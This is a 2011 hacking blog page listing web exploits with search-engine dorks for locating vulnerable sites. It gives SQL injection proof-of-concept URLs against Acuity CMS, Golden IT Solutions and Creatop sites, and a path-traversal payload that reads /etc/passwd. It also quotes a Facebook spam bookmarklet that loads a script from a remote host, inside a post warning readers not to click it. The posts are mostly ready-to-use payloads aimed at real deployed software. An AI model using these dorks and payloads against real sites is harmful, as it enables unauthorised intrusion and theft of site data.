Monday, May 23, 2011

Acuity CMS Vulnerable to Blind SQL Injection


Title : Acuity CMS Vulnerable to Blind SQL Injection
Found by : p0pc0rn
Dork : intext:"Powered by Acuity CMS."
Web : http://www.acuitycms.com/

SQL Injection
----------------
http://www.site.com/browse.asp?page=[Blind SQL]

POC
----
http://www.site.com/browse.asp?page=255+or+1=1 TRUE
http://www.site.com/browse.asp?page=255+or+1=1 FALSE

thanks,
-p0pc0rn-

Golden IT Solutions Web Design Vulnerable to SQL Injection

Title : Golden IT Solutions Web Design Vulnerable to SQL Injection
Found by : p0pc0rn
Dork : intext:"Developed By : Golden IT Solutions"

SQL Injection
----------------
http://www.site.com/anypath.php?ID=[SQL]

POC
----
http://www.site.com/memProfile.php?ID=-2800 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--



thanks,
-p0pc0rn-

Saturday, May 21, 2011

New LFI Exploit found :)

New LFI Exploit found :)
-------------------------
By p0pc0rn May 2011
Dork: inurl:"index.php?loc=subindex"
Exploit :
site.com/index.php?loc=../../../../../../../../../../../../../../../etc/passwd





thanks
-p0pc0rn-

Wednesday, May 11, 2011

New WallSpam Using Javascript in Facebook

New WallSpam Using Javascript in Facebook
------------------------------------------

If u notice a wallpost like this,NEVER EVER CLICK IT!!
[spam]Not like Justin Biebier which always never say never.He's an idiot [/spam]

Take note the url below your browser.when you click the link,you will execute a javascript to post it on your wall.
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
http://pelorak.info/verify.js
<--bad evil code!!



I tried to click and this what appeared.


And the it'll redirect you to here

So,just like others,your profile will full with spams.
Beware more will come after this.Someone will take this as an oppurtunity to have fun.

Tuesday, May 3, 2011

Creatop Web Design Vulnerable to PosgreSQL Injection


Title : Creatop Web Design Vulnerable to PosgreSQL Injection
Vendor: http://www.creatop.com.au/
Found : by p0pc0rn
Dork : intext:"by Creatop" filetype:cfm

PosgreSQL Injection
-------------------
http://www.victim.com/index.cfm?MenuID=[Injection]

Example:
http://www.victim.com/index.cfm?MenuID=80 and 1=cast(version() as int)
### ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" ###



.:p0pc0rn:.